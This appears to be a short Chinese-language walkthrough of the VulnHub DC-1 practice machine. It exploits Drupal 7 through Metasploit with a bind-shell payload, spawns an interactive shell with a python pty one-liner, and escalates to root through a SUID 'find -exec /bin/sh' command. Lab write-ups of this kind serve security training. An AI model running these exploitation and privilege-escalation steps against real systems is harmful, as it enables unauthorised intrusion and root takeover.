DC1(msf drupal7+suid-find提权)

Posted kuaile1314

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了DC1(msf drupal7+suid-find提权)相关的知识,希望对你有一定的参考价值。

这边我们靶机是仅主机模式,IP是192.168.56.101,,直接上msf拿到shell,  不过payload要改一下 改成php/meterperter/bind_tcp

 

技术图片

 

 

 

拿到shell了 ,采用交互式

python -c "import pty;pty.spawn(‘/bin/bash‘)"

 

find / -type f -perm -u=s 2>/dev/null #find查看root
find /var/www -exec "/bin/sh" ; # find提权

 

 

技术图片

以上是关于DC1(msf drupal7+suid-find提权)的主要内容,如果未能解决你的问题,请参考以下文章

Os-hackNos-1(drupal7+suid提权)

我需要多少个 Redshift 节点 (dc1.large) 来存储 0.2 TB?

如何在记事本++中搜索DC1之类的符号

typescript dc1.app.ts

实验演示---GSLB部分(DC1)

vulnhub DC1 靶场练习